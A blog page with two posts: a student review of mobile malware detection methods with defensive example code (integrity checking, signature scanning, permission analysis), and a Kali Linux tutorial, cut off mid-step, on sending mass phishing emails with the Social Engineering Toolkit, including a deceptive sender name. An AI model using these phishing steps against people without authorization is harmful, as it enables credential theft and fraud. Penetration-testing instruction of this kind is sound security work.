Tuesday, September 5, 2017

A Review of Mobile Malware Detection Methods



Abstract—Over the past ten years, smartphones have become widespread. These small devices are spreading rapidly with the emergence and popularity of wireless technology. Mobile devices store personal information such as contacts and text messages. While these devices are increasingly preferred by users of all ages, they are vulnerable to malicious code such as viruses and worms. As the functionality of these devices has grown, so has their exposure to malicious activity. The evolution of mobile malware is thought to follow the same direction as PC malware.


I.     INTRODUCTION

Mobile phones have evolved to support multiple functions. As mobile phone functionality improves, the opportunity for exploitation by malicious activity also increases. Services such as social networking and games are provided on smartphones through third-party applications, and such applications are also released in order to obtain sensitive information from mobile devices. There are many kinds of smartphone OS in the world; the most popular is Android. Any third-party vendor can create applications that run on Android devices and publish them on an app market such as the Play Store. In some cases, even a trusted application can share the user's information with others without the user's consent. The evolution of malware on mobile devices is widely considered to follow the same direction as PC malware evolution. Mobile devices incorporate a variety of wireless communication methods that make them easy to connect, which also makes them a simple target for malware. Like PCs, mobile devices can access the Internet for web browsing and email, and they can also communicate over WLAN, SMS/MMS and Bluetooth. The most important reason to believe that attackers target mobile devices is that they are far more popular among users. Therefore, alongside the development of technology and detection algorithms, special attention is needed to protect these networked devices from malware.

II.     Research Objectives

Due to the expansion of mobile devices around the world, the number of malware samples attacking mobile devices is also increasing, and special attention is needed to protect these devices from malware. There are many types of threats to mobile devices; some of them are described in Section III, together with the history of mobile threats. Many researchers have carried out various kinds of research on this topic, and Section IV reviews those publications.

III.     Definitions and Categories

A.     Types of Attacks

The work by Dagon et al. [1] examined the types of attacks, which are listed below.

Table 1: Types of Mobile Attacks

Security Goal      Attack Types
Confidentiality    Theft of data, blue-bugging, blue-snarfing
Integrity          Mobile-hijacking
Availability       Denial-of-service and battery draining

1)     Theft of data

Theft of data is the act of stealing information stored on a computer, server or other device from an unknowing victim, infringing privacy or obtaining confidential information. Attackers try to obtain both dynamic and static information. Dynamic information includes location data, power usage and other sensitive data that the device does not usually capture [1]. Static information consists of data that mobile devices store or send over the network. The blue-snarfing and blue-bugging attacks are examples of theft of data. The blue-bugging attack gives unauthorized access to the mobile phone and allows phone calls to be eavesdropped; it has since evolved to the point of being able to control, navigate and misuse the various functions of the phone [1]. The blue-snarfing attack is unauthorized access to, and retrieval of data from, applications.



2)     Denial-of-Service (DoS)

DoS can be carried out by flooding the device with unusual traffic, or by draining the power or degrading the performance of the mobile device. Most Bluetooth applications on mobile devices can be crashed by repeatedly sending unexpected packets, corrupted packets and wrong file formats. DoS is a major attack type that exploits known vulnerabilities [2].

3)     Mobile-hijacking

Some malicious programs or apps try to use the victim's mobile resources. Pirated copies of PC games have been infected with viruses that sent costly SMS messages when users played the illegal copies. Hijacking of phone resources is therefore not unexpected.

B.     Threats on Mobile Devices

Threats on mobile devices are malicious software targeting mobile phones and wireless-capable PDAs, causing system collapse and the loss or leakage of confidential information by means of WLAN, Bluetooth and SMS/MMS. There are various attack vectors that undermine the security of cell phones. There are three main types of attacks: malware attacks, grayware attacks and spyware attacks.

1)     Malware

This type of attack steals sensitive information from mobile devices and can also damage the devices [22]. If the device is vulnerable, or the user is tricked into installing unwanted applications, the attacker can gain root access to the device. There are many types of malware; several attacks are described below.

a)     SMS attacks

In SMS attacks, an attacker can advertise and disseminate phishing links. An attacker can also exploit vulnerabilities by using SMS messages [22].

b)     Bluetooth attacks

In Bluetooth attacks, an attacker can steal the victim's sensitive data from the device and track the location of the mobile. With blue-bugging, an attacker can launch software containing malicious functionality and listen to conversations [22].

c)     Phone jail-breaking

Jail-breaking removes the security restrictions of the operating system and allows applications to be installed without the signatures the OS normally requires. It attracts users who want to take advantage of additional features [22].

d)     Premium rate attacks

A premium rate service can deliver valuable content to mobile devices; when used legitimately, users can receive financial information, technical support or adult services [22].

2)     Spyware

Spyware is another type of attack; it is installed on a computer or mobile device without the owner's knowledge and collects the owner's personal information. Spyware installed without the user's permission can gain access to the device, and the information it collects about the victim's phone is sent to the attacker.

3)     Grayware

Grayware consists of applications that behave in an irritating or undesirable way. Most often, grayware collects data from mobile devices for marketing purposes. Its goal is not to harm users but rather to annoy them.

C.     Attacks on Mobile Devices

Looking at the history of attacks, many Trojan horses, worms and viruses have entered the mobile world and continue to have influence. Well-known examples of threats on Symbian-based smartphones include Cabir, Skull and Mabir [1]. Many variants of these viruses strengthen the attack and reveal unexpected levels of exposure. According to the McAfee 2008 mobile security report, almost 14% of mobile users worldwide had been directly infected by mobile malware or knew someone who had been. One of the key characteristics that differentiates threat actors is motivation. Although not every actor needs to steal information in every campaign to achieve a goal, many campaigns require it. Figure 1 below describes the motivations of threat actors [3].


State-based entities generally try to gain strategic advantage, which often means targeting intellectual property. The financial goal of organized criminals makes their motivation easy to understand; they tend to focus on credit card data, banking transactions or personally identifiable information.
Hacktivists are probably the hardest to stop, as leaked internal data can affect the reputation of the organization.


Most security breaches in past years were easily detectable; they were complex in their planning, targeting, stalking and execution. According to McAfee [3], the past two years have seen a change, with a significant increase in the number of technically sophisticated attacks. Such an attack looks like a fragmentary intrusion, but it hides in inactive code, waiting for an unprotected moment. These threats evade legacy signature-based traps, change with each new deployment using encryption and dynamic code modification, and prevent data corruption.
Given the popularity of the Android OS, the likelihood of Android devices being attacked is higher. The malware called Slocker rose to become a more prominent threat in 2015 [4]. Slocker's growing prevalence indicates that mobile malware targets content stored on the device.



If one malicious program shares code or behavioral features with another, they are usually considered to belong to the same family.
Security software often detects individual threats within a malware family by identifying the essential characteristics of that family. Figure 3 describes the top ten Android malware families of 2015 and what they do, according to the F-Secure Threat Report 2015 [4].


D.     Approaches in Malware Detection

Malware needs to be analyzed in order to understand the risks associated with it. Many detection methods exist in the literature to clarify the behavior and function of malware, and in recent years interest in malware detection technology for mobile devices has increased. Three main approaches are considered here.

1)     Static analysis

Static analysis inspects the properties and source code of a downloaded app without running it. However, code encryption makes static analysis difficult. Static analysis is further divided into two categories.

a)                   Signature-based detection

Signature-based detection uses specific patterns, such as byte sequences or known malicious instruction sequences, to detect attacks. The patterns being detected are referred to as signatures [5]. Signature detection can identify malicious code before it infects the device.

b)     Behavior-based detection

This is another general technique: a behavior checker resident in memory looks for abnormal behavior and, when it finds some, alerts the user. Behavior checkers have the disadvantage that some changes may already have been made to the system before the malicious activity is detected.

2)     Dynamic analysis

Dynamic analysis runs the application in a separate, controlled environment and tracks its execution behavior. Because the executed code itself is analyzed, dynamic analysis reveals the actual behavior of the malware and is therefore not affected by obfuscation attempts.

3)     Integrity Checking

Integrity checking keeps a log of all files existing on the system. The log records characteristics of each file such as its size, timestamp and checksum. Each time the integrity checker runs, the files on the system are examined and compared with the previously saved characteristics.
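The integrity checker described above, as an added example that is not part of the original paper: it records size, modification time and a SHA-256 checksum for every file under a directory, saves that baseline as JSON, and on a later run classifies each path as added, removed, modified or unchanged. The function names and the tampering scenario in demo() are this example's own.

```python
import hashlib
import json
import os
import tempfile


def sha256_of_file(path, chunk_size=65536):
    """Stream the file through SHA-256 so large files need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def take_snapshot(root):
    """Return {relative path: {size, mtime, sha256}} for every file under root."""
    snapshot = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            st = os.stat(full)
            snapshot[rel] = {"size": st.st_size, "mtime": st.st_mtime,
                             "sha256": sha256_of_file(full)}
    return snapshot


def save_snapshot(snapshot, log_path):
    """Persist the baseline; in a real deployment this log must itself be protected."""
    with open(log_path, "w") as fh:
        json.dump(snapshot, fh, indent=2, sort_keys=True)


def load_snapshot(log_path):
    with open(log_path) as fh:
        return json.load(fh)


def compare_snapshots(baseline, current):
    """Classify every path as added, removed, modified or unchanged.

    The checksum decides "modified": size and mtime are cheap hints, but a
    same-size edit with a restored timestamp would slip past them alone.
    """
    report = {"added": [], "removed": [], "modified": [], "unchanged": []}
    for path in sorted(set(baseline) | set(current)):
        if path not in baseline:
            report["added"].append(path)
        elif path not in current:
            report["removed"].append(path)
        elif baseline[path]["sha256"] != current[path]["sha256"]:
            report["modified"].append(path)
        else:
            report["unchanged"].append(path)
    return report


def demo():
    """Constructed scenario: baseline a small tree, tamper with it, re-check."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        with open(os.path.join(root, "bin", "ls"), "wb") as fh:
            fh.write(b"original binary contents")
        with open(os.path.join(root, "config.txt"), "w") as fh:
            fh.write("setting=1\n")
        with open(os.path.join(root, "readme.txt"), "w") as fh:
            fh.write("untouched\n")

        fd, log_path = tempfile.mkstemp(suffix=".json")  # baseline kept outside root
        os.close(fd)
        try:
            save_snapshot(take_snapshot(root), log_path)
            # Simulated tampering: a same-size edit, a new file and a deleted file.
            with open(os.path.join(root, "bin", "ls"), "wb") as fh:
                fh.write(b"original binary contentz")
            with open(os.path.join(root, "bin", "unexpected"), "wb") as fh:
                fh.write(b"new file")
            os.remove(os.path.join(root, "config.txt"))
            return compare_snapshots(load_snapshot(log_path), take_snapshot(root))
        finally:
            os.remove(log_path)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```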

IV.     Review Of The Literature

Some relevant related work covering the above-mentioned malware detection techniques is presented and reviewed in this section.

D. Venugopal [5] described a method of representing signatures for detecting viruses on mobile devices. A hash table is used to store hash values of the virus signatures for fast matching. To speed up the process, the first part of each signature, a fragment chosen because it is unlikely to occur in a regular file, is matched before the whole signature is compared. A Nokia 6682 device running Symbian OS was used to test this method. As a result, the method was 98% faster than a sequential scan. However, new malware that is completely different from previous malware cannot be detected with this method. To improve detection, it needs to be combined with more sophisticated malware detection methods such as heuristic scanning. As viruses evolved, the technology to protect against them had to evolve too; the detection of malicious code in this context includes more sophisticated approaches such as heuristics and behavior analyzers [6].
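A sketch of the hash-table-with-cut idea from [5], as an added example and not Venugopal's own code: each signature is keyed in a dictionary by its first few bytes (the "cut"), the scanner looks up every window of the file at that length, and only a window that hits the table triggers a comparison of the full signature. The signatures and sample files are constructed for the example and are not real malware patterns; the variant sample shows the stated limitation that a changed sample goes undetected.

```python
CUT_LEN = 4  # bytes of each signature used as the hash-table key

# Constructed demo signatures (arbitrary bytes, not real malware patterns).
SIGNATURES = {
    "demo.worm.a": b"\x7fW0RM\x00\x01\x02payload-a",
    "demo.trojan.b": b"TRJ!\x99\x88\x77send-sms",
}

# Constructed sample files: "header bytes" is 12 bytes, so the hit is at offset 12.
SAMPLE_CLEAN = b"hello world, this is an ordinary text file with no patterns"
SAMPLE_INFECTED = b"header bytes" + SIGNATURES["demo.worm.a"] + b" trailing data"
SAMPLE_VARIANT = b"header bytes" + b"\x7fW0RM\x00\x01\x03payload-a"  # one byte differs


class SignatureStore:
    """Hash table keyed by the first cut_len bytes of each signature."""

    def __init__(self, cut_len=CUT_LEN):
        self.cut_len = cut_len
        self.table = {}  # cut -> list of (name, full signature)

    def add(self, name, signature):
        if len(signature) < self.cut_len:
            raise ValueError("signature shorter than cut length: %s" % name)
        self.table.setdefault(signature[: self.cut_len], []).append((name, signature))

    def scan(self, data):
        """Return (hits, stats); hits is a list of (signature name, offset)."""
        hits = []
        stats = {"windows": 0, "table_hits": 0, "full_compares": 0}
        for i in range(len(data) - self.cut_len + 1):
            stats["windows"] += 1
            candidates = self.table.get(data[i : i + self.cut_len])
            if not candidates:
                continue  # the common case: no signature starts at this offset
            stats["table_hits"] += 1
            for name, signature in candidates:
                stats["full_compares"] += 1
                if data.startswith(signature, i):
                    hits.append((name, i))
        return hits, stats


def sequential_scan(data, signatures):
    """Baseline without a pre-filter: every signature is searched in the whole file."""
    return sorted((name, data.find(sig)) for name, sig in signatures.items() if sig in data)


def build_store(signatures=SIGNATURES):
    store = SignatureStore()
    for name, signature in signatures.items():
        store.add(name, signature)
    return store


if __name__ == "__main__":
    store = build_store()
    for label, sample in (("clean", SAMPLE_CLEAN), ("infected", SAMPLE_INFECTED),
                          ("variant", SAMPLE_VARIANT)):
        hits, stats = store.scan(sample)
        print(label, hits, stats)
```

The stats show the point of the cut: the full-signature comparison runs once for the infected file and once for the variant (which the cut lets through but the full compare rejects), while the clean file never reaches a full compare.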

D. Venugopal, G. Hu and N. Roman [7] described a method that differs from the previous one: an intelligent heuristic method is used to detect viruses on mobile devices. It relies on Dynamic Link Libraries (DLLs) for detection, since the list of DLL functions a program uses indicates the nature of a virus. With this approach, new viruses can be detected. According to the research, the method was tested on Symbian OS and achieved a 95% detection rate and a 0 false detection rate across all viruses and non-virus programs.

A. Schmidt, F. Peters, F. Lamour and S. Albayrak [8] described a machine learning approach for detecting malicious activity on mobile devices such as smartphones. A remote anomaly detection system performs the anomaly detection. Each smartphone acts as a client and sends a set of features, extracted by monitoring measurements of different hardware and software resources, to the remote anomaly detection system, where the features are stored in a database. The detection components access the database to analyze the data for malicious activity. The method was tested on Symbian OS and Windows Mobile. As a result, there are disk space savings, computational and communication cost savings, and a positive impact on battery life.

Kim et al. [9] proposed a framework for detecting and monitoring energy-greedy threats by constructing power signatures from collected samples. After the power signatures are generated, the data analyzer compares them with the signatures stored in the database. Batyuk et al. [10] proposed a system for static analysis of Android applications; the method goes on to mitigate the security threat introduced by an application by disabling its malicious functionality. Ongtang et al. [11] proposed a secure application interaction framework that extends the Android security architecture to protect interfaces and enforce interaction policies.

J. Cheng et al. [12] presented a behavior checking system for smartphones called SmartSiren, which consists of a cooperative virus detection and alert system. Each smartphone runs a light-weight agent that tracks communication activity on the device and periodically reports a summary of these activities to a proxy. The centralized proxy assists the virus detection and alert processes: it collaboratively analyzes the reports received and identifies single-device or system-wide virus behavior. When a potential virus is detected, the proxy sends an alert both to the infected device and to a subset of other devices that may have been in direct contact with it. As a result, SmartSiren prevents wide-area virus outbreaks. A better result can be obtained by using this method instead of signature-based detection.


Bose et al. [13] presented a behavioral detection framework that works by representing malware behavior; to do so, it discovers the logical ordering of application actions. Malicious behavior is distinguished from normal behavior by training a support vector machine (SVM). The system was evaluated with an accuracy of 96% for both real-world and pseudo mobile malware.

The behavior-based malware detection method called pBMDS was described by L. Xie et al. [14]. It uses a probabilistic approach, matching user inputs with system calls to detect suspicious activity on mobile phones. It observes the specific behavior of applications and user operations on these input- and output-constrained devices. A hidden Markov model (HMM) is used to learn user behavior and malware behavior so that the two can be discriminated. As a result, pBMDS was shown to be effective, lightweight, easy to deploy, and capable of detecting unknown malware.

Wei et al. [15] proposed a static feature-based approach and developed a system called DroidMat that can detect and distinguish Android malware. Their mechanism considers the static information characterizing Android malware, namely access permissions, intents and components, and applies a clustering algorithm to enhance malware modeling capabilities. DroidMat is efficient: it classifies 1738 applications in half the time taken by Androguard, a well-known tool presented at Black Hat 2011.

Enck et al. [16] proposed the AppsPlayground framework for automatic dynamic analysis of Android applications. It allows both malicious applications and applications that leak personal data from smartphones without user consent to be analyzed. For dynamic analysis, a detection technique that explores as much of the application code as possible is necessary, and the environment must be realistic enough that a malicious application cannot hide its behavior. Automated exploration effectively covers the application by integrating discovery, and the detection technology detects malicious functionality while the application runs: it uses TaintDroid taint tracing to monitor flows of confidential information, monitors sensitive APIs such as the SMS API, and performs kernel-level monitoring to trace root exploits. Automatic exploration techniques improve code coverage by simulating events; intelligent black-box execution tests and fuzz tests are used for automatic discovery of application behavior. Disguise techniques create a realistic environment by providing data such as IMEI, contacts, SMS and GPS coordinates.

An Android Application Sandbox (AASandbox) system for the analysis of Android applications was proposed by T. Bläsing et al. [17]; it consists of a high-speed static pre-check function and a kernel-space sandbox. Static analysis and dynamic analysis are both used to detect suspicious Android applications. AASandbox takes an APK file and decompresses it to obtain the following files: AndroidManifest.xml, res/ and classes.dex.
Security permissions and the application description are contained in the manifest file. The res/ folder defines the layout, the graphical user interface (GUI) elements and the language of the application. The classes.dex file contains the executable code that runs on the Dalvik VM; this code is decompiled using baksmali and searched for suspicious code patterns. The Monkey program, created for application stress testing, generates a pseudo-random sequence of user events. The sandbox hijacks and logs system calls, which yields the application's behavior at the system level. For testing purposes, approximately 150 applications were gathered [17].

A dynamic analysis system based on runtime behavior for Android applications was presented by L. X. Min and Q. H. Cao [18]. The system includes an event detector, a log monitor and a parser. Event triggers can use static analysis to simulate user behavior. The static analyzer takes the application .apk file and generates the manifest.xml and Java code. Semantic analysis retrieves a list of risk-based permissions, activities and services, together with other information such as hash codes and package names. A control flow graph (CFG) of the application is generated by dataflow analysis [18], which maps user-defined methods and API calls. Confidential information about applications is obtained by executing them in customized emulators using a loadable kernel module (LKM). Highly confidential operations recorded by the debug tool logcat are sent to the log parser. The log monitor collects log data while the application is running, and the parser analyzes it by extracting confidential information and filtering out unnecessary information. 82 of 350 apps obtained from the Amazon Android market were shown to leak the user's private sensitive data [18].

Portokalidis et al. [19] presented a method called Paranoid Android. It uses remote security servers that hold an exact replica of the mobile phone in a virtual environment, on which the security of the smartphone is checked. Because the server is not subject to the same constraints as the smartphone, multiple detection methods can be applied simultaneously. The execution of the phone is recorded and replayed on the security server in the cloud. When an attack is detected, Paranoid Android uses a warning mechanism to alert the user about the malicious activity that is about to happen. If the device has already been compromised by the attack, it can be recovered. The prototype of Paranoid Android was tested on an Android mobile phone [19]. As a result, even during periods of high activity the transmission overhead is kept at 2.5 Kbps or less; the idle period is shortened, and battery life is reduced by about 30%.

A framework for a background monitoring system was described by M. Becher and F. C. Freiling [20]. It works by collecting the software the user is about to install on the device and automatically performing a dynamic analysis of it. The analysis system uses the mobile network, rather than the mobile device, as the analysis location for two reasons. First, the mobile network has more computing power and can carry out a more thorough analysis. Second, since it is easier to handle than local connections, it is assumed that the mobile network will deliver most software. Therefore, software is analyzed for suspicious behavior in the mobile network before the user installs it on the mobile device. This is done by automatic dynamic analysis in which system calls are recorded and malicious acts are analyzed. Dynamic analysis is done in three stages. In the first stage, the software components are collected. In the second stage, the collected samples are analyzed with specific modules called mobile sandboxes; this is similar to the process described by T. Bläsing [17]. The module runs the sample in an environment where each step of the examined sample can be watched, which yields the series of API calls used during program execution. The third stage is the response to the analysis: when malicious activity is detected, the installation of the software can be rejected by the mobile network operator, which might also send a message alerting the user that the program violates the user's or the network's security profile.

In addition to these methods, an architecture for automatically downloading Android applications from the Android market was proposed by R. Johnson, Z. Wang, C. Gagnon et al. [21]. Various algorithms are used to search for applications, such as downloading applications by category. With static analysis, the permissions an application actually requires can be derived from its functionality. Each permission name is searched for in the Android source code and mapped to the API calls it protects, so that it can be checked whether a requested access right is justified. The program examines all the files of the application and obtains the list of method calls the application uses. Each method call is then compared with the method calls listed in the permission-protected Android API to find the exact permissions required. The derived set of required permissions is compared with all the permissions declared in the AndroidManifest.xml file [21] to identify similarities and differences: additional permissions that are declared but not required, missing access rights, and permissions not needed for the application's functionality.
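The manifest-versus-API comparison from [21], reduced to its core as an added example that is not the authors' tool: a constructed AndroidManifest.xml is parsed for declared permissions, a constructed list of method calls (standing in for what a real tool extracts from classes.dex) is mapped through a small hand-written API-to-permission table, and the two sets are compared to flag over-declared and missing permissions. The table entries are illustrative and assumed, not the full mapping derived from the Android source; the package name and all function names are this example's own.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed manifest for a hypothetical app.
MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.demo">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <application android:label="Demo"/>
</manifest>
"""

# Assumed, illustrative subset of the permission-protected API table. Each API
# maps to the set of permissions any one of which is sufficient to call it.
API_PERMISSIONS = {
    "android.telephony.SmsManager.sendTextMessage":
        frozenset({"android.permission.SEND_SMS"}),
    "android.location.LocationManager.getLastKnownLocation":
        frozenset({"android.permission.ACCESS_FINE_LOCATION",
                   "android.permission.ACCESS_COARSE_LOCATION"}),
    "android.telephony.TelephonyManager.getDeviceId":
        frozenset({"android.permission.READ_PHONE_STATE"}),
    "java.net.URL.openConnection":
        frozenset({"android.permission.INTERNET"}),
}

# Constructed list of the method calls "found" in the app's code.
API_CALLS_IN_CODE = [
    "android.telephony.SmsManager.sendTextMessage",
    "android.location.LocationManager.getLastKnownLocation",
    "java.net.URL.openConnection",
    "java.lang.String.length",  # not permission-protected; ignored by the table
]


def declared_permissions(manifest_xml):
    """Permissions named in <uses-permission android:name=...> elements."""
    root = ET.fromstring(manifest_xml)
    name_attr = "{%s}name" % ANDROID_NS
    return {el.get(name_attr) for el in root.iter("uses-permission") if el.get(name_attr)}


def required_permissions(api_calls, table=API_PERMISSIONS):
    """Map each permission-protected call in the code to its acceptable permissions."""
    return {call: table[call] for call in api_calls if call in table}


def analyze(manifest_xml, api_calls, table=API_PERMISSIONS):
    """Compare declared permissions with those the code's API calls require."""
    declared = declared_permissions(manifest_xml)
    required = required_permissions(api_calls, table)
    used = set()
    missing = {}
    for call, alternatives in required.items():
        granted = alternatives & declared
        if granted:
            used |= granted
        else:
            missing[call] = sorted(alternatives)  # call would fail at runtime
    return {
        "declared": sorted(declared),
        "used_declared": sorted(used),
        "unused_declared": sorted(declared - used),  # over-privilege candidates
        "missing": missing,
    }


if __name__ == "__main__":
    for key, value in analyze(MANIFEST, API_CALLS_IN_CODE).items():
        print(key, value)
```

For the constructed app the result flags READ_CONTACTS as declared but never used, and getLastKnownLocation as needing a location permission the manifest does not declare.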

V. FUTURE RESEARCH

The threat associated with mobile malware is growing with the spread of mobile devices all over the world. New malicious mobile programs are introduced daily as mobile technologies advance. Mobile devices are a major part of our daily lives, connecting us to social media, banking, videos, gaming, online shopping and so on; therefore, preventing these mobile threats is highly recommended. This review has discussed the history and the current state of mobile malware detection techniques. The future of mobile malware and of detection techniques should also be discussed in order to make that future better.
The review showed that anomaly detection is mainly performed by a proxy that is located away from the attack source. This type of detection concept has two main advantages. First, large-scale detection solutions require high processing speed and power, which is easier to provide on a proxy than on the device. Second, since a reactive approach is considered better than an aggressive one, the proxy can inform other users of potential attacks before the entire network is involved in malware activity. Given the rapidly changing nature of attacks, there is no way to specify a single method for the future of virus detection. What is required is an efficient malicious activity detection method; it could reduce the spread rate and could also be applied at the network level to stop spreading through network routes. It seems highly likely that future malicious code detection technology will be essentially distributed, and that the focus will shift from endpoint protection to network-wide protection. There are several recommendations for designing algorithms to detect mobile applications containing malware:
- To build a feature set that detects mobile malware, multiple feature extraction sources are needed.
- In order for developers to recognize vulnerabilities related to mobile malware, domestic and foreign databases are required to report malware incidents.
- Machine communication and authentication tools must be used across multiple device platforms.
- To improve the detection rate, an artificial intelligence algorithm should be used.
This review forms the foundation for future work on mobile malware detection. It has also established the framework of investigation necessary to advance towards the development of a network-wide protection framework.

VI.     Conclusion

Smartphones are becoming increasingly capable in terms of processing power, sensors and communication. Modern smartphones offer many services such as messaging, Internet browsing, e-mail, games and so on, in addition to traditional voice services. Because of this multifunctionality, new security threats are emerging on mobile devices. This paper is a review of malware detection techniques for mobile devices. Additionally, the history and current situation of mobile threats and vulnerabilities have been discussed, and problems with traditional signature-based detection methods have been highlighted. Various mobile malware detection methods were described. This paper provides sufficient literature for researchers on mobile malware detection methods, and we hope that it will motivate researchers and practitioners to examine mobile security issues and their applications.

Acknowledgment

This work was supported in part by all the authors who shared their knowledge through the research cited below. We also thank our supervisor in charge of this module, Mr. Amila Nuwan Senarathne, who guided us throughout the semester.

References

[1]    D. Dagon, T. Martin, and T. Starner, “Mobile Phones as Computing Devices: The Viruses are Coming!,” IEEE Pervasive Computing, vol. 3, no. 4, Oct.-Dec. 2004, pp. 11-15.
[2]    Q. Yang, R. H. Deng, Y. Li, and T. Li, “On the Potential of Limitation-oriented Malware Detection and Prevention Techniques on Mobile Phones,” International Journal of Security and its Applications, vol. 4, no. 1, Jan. 2010.
[3]    McAfee Labs, “McAfee Labs Threats Report,” August 2015.
[4]    F-Secure, “Threat Report,” 2015.
[5]    D. Venugopal, “An Efficient Signature Representation and Matching Method for Mobile Devices,” Proc. 2nd Annual International Workshop on Wireless Internet (WICON ’06), Boston, MA, USA, 2006.
[6]    A. Shevchenko, “Malicious Code Detection Technologies,” Kaspersky Lab, 2008. [Online]. Available: https://pdfs.semanticscholar.org/36a6/675b54a963aa4cba708882f1e172536a5dba.pdf
[7]    D. Venugopal, G. Hu, and N. Roman, “Intelligent Virus Detection on Mobile Devices,” Proc. International Conference on Privacy, Security and Trust: Bridge the Gap between PST Technologies and Business Services (PST ’06), Ontario, Canada, 2006, pp. 1-4.
[8]    A. Schmidt, F. Peters, F. Lamour, and S. Albayrak, “Monitoring Smartphones for Anomaly Detection,” Proc. 1st International Conference on MOBILe Wireless MiddleWARE, Operating Systems, and Applications, 2008.
[9]    H. Kim, J. Smith, and K. G. Shin, “Detecting energy-greedy anomalies and mobile malware variants,” Proc. 6th International Conference on Mobile Systems, Applications, and Services (MobiSys ’08), ACM, 2008, pp. 239-252.
[10]  L. Batyuk, M. Herpich, S. A. Camtepe, K. Raddatz, A. D. Schmidt, and S. Albayrak, “Using static analysis for automatic assessment and mitigation of unwanted and malicious activities within Android applications,” 2011 6th International Conference on Malicious and Unwanted Software, Fajardo, 2011, pp. 66-72.
[11]  M. Ongtang, S. E. McLaughlin, W. Enck, and P. D. McDaniel, “Semantically rich application-centric security in Android,” Proc. 25th Annual Computer Security Applications Conference (ACSAC), 2009, pp. 340-349.
[12]  J. Cheng, S. Wong, S. H. Y. Wong, H. Yang, and S. Lu, “SmartSiren: Virus Detection and Alert for Smartphones,” Proc. 5th International Conference on Mobile Systems, Applications and Services (MobiSys ’07), San Juan, Puerto Rico, 2007, pp. 258-271.
[13]  A. Bose, X. Hu, K. G. Shin, and T. Park, “Behavioral detection of malware on mobile handsets,” Proc. 6th International Conference on Mobile Systems, Applications, and Services (MobiSys ’08), ACM, New York, 2008, pp. 225-238.
[14]  L. Xie, X. Zhang, J. Seifert, and S. Zhu, “pBMDS: A Behavior-based Malware Detection System for Cellphone Devices,” Proc. 3rd ACM Conference on Wireless Network Security (WiSec ’10), Hoboken, New Jersey, USA, 2010.
[15]  D. J. Wu, C. H. Mao, T. E. Wei, H. M. Lee, and K. P. Wu, “DroidMat: Android Malware Detection through Manifest and API Calls Tracing,” 2012 Seventh Asia Joint Conference on Information Security, Tokyo, 2012, pp. 62-69.
[16]  V. Rastogi, Y. Chen, and W. Enck, “AppsPlayground: Automatic Security Analysis of Smartphone Applications,” Proc. 3rd ACM Conference on Data and Application Security and Privacy (CODASPY ’13), ACM, 2013, pp. 209-220.
[17]  T. Bläsing, L. Batyuk, A. D. Schmidt, S. A. Camtepe, and S. Albayrak, “An Android Application Sandbox System for Suspicious Software Detection,” 2010 5th International Conference on Malicious and Unwanted Software, Nancy, Lorraine, 2010, pp. 55-62.
[18]  L. X. Min and Q. H. Cao, “Runtime-Based Behavior Dynamic Analysis System for Android Malware Detection,” Advanced Materials Research, vols. 756-759, 2013, pp. 2220-2225.
[19]  G. Portokalidis, P. Homburg, K. Anagnostakis, and H. Bos, “Paranoid Android: Versatile Protection for Smartphones,” Proc. 26th Annual Computer Security Applications Conference (ACSAC ’10), Austin, Texas, USA, Dec. 6-10, 2010, pp. 347-356.
[20]  M. Becher and F. C. Freiling, “Towards Dynamic Malware Analysis to Increase Mobile Device Security,” Proc. SICHERHEIT, 2008, pp. 423-433.
[21]  R. Johnson, Z. Wang, C. Gagnon, and A. Stavrou, “Analysis of Android Applications' Permissions,” 2012 IEEE Sixth International Conference on Software Security and Reliability Companion, Gaithersburg, MD, 2012, pp. 45-46.
[22]  D. Stites and A. Tadimla, “A Survey of Mobile Device Security: Threats, Vulnerabilities and Defenses,” 2011. [Online]. Available: http://afewguyscoding.com/2011/12/survey-mobile-device-security-threats-vulnerabilities-defenses/

A.A.C.S Wickramasinghe, Undergraduate, SLIIT 
G.A.A.I.S De Silva, Undergraduate, SLIIT





Tuesday, August 22, 2017

Mass Email Attack Kali Tutorial

Mass email senders are not a new topic for the ethical hacking community. Certainly we need to send mass emails during penetration tests, phishing tests to be more specific. During phishing tests, penetration testers often need to send bulk emails to the employees of the organisation we are conducting the penetration test for.
Though there are many bulk mail sending programs available out there, there is nothing as good as the bulk sending tool that is already present in our favourite penetration testing OS: Kali Linux.

Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills; we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to them.

In this post I will be sending mass emails using Kali Linux and SET (Social Engineering Toolkit).

To begin with the mass email attack, you first need an email list that has either been harvested or supplied to you by the organisation you are conducting the penetration test for.

Now I will open the Social Engineering Toolkit (SET). Simply open a terminal and type:

se-toolkit

SET opens up.

Select Social Engineering, i.e. option 1.

As we need to do a mass email attack, select option 5 (Mass Mailer Attack).

Option 5 : Mass Mailer Attack

Then select option 2 for the email mass mailer, as this tutorial deals with the mass sender and not a single email address. Option 1 might be useful for spear-phishing attacks.

Option 2 : Email Attack Mass Mailer



Now you need to define the path to the email list. This is email_list in our case; just add the file name with its path.


Now select option 1, as we will be using a Gmail account for sending the mass emails because we don't have our own SMTP server. In case you have a self-hosted email server / SMTP server (as used by professional spammers), feel free to explore the other options.

Option 1 : Use a Gmail account for email attack

Enter the Gmail address. The email address must be correct and you must also have the password for it to successfully send the emails.

Now enter the name that you want the email recipients to see in their inbox. This is the name that will flash first in front of your victim. Pay attention to this field specifically, as this is where the actual social engineering takes place.
This could be “Admin” in the case of a spear-phishing attack.

Now SET will ask you to enter the password for the email account.
Enter the Gmail password.
Now you have the option to specify whether or not you want to flag this message as high priority. Sometimes this may work and sometimes it might make the victim suspicious, so I suggest using this option as you see fit.
Now SET will ask you to enter the subject of the email.
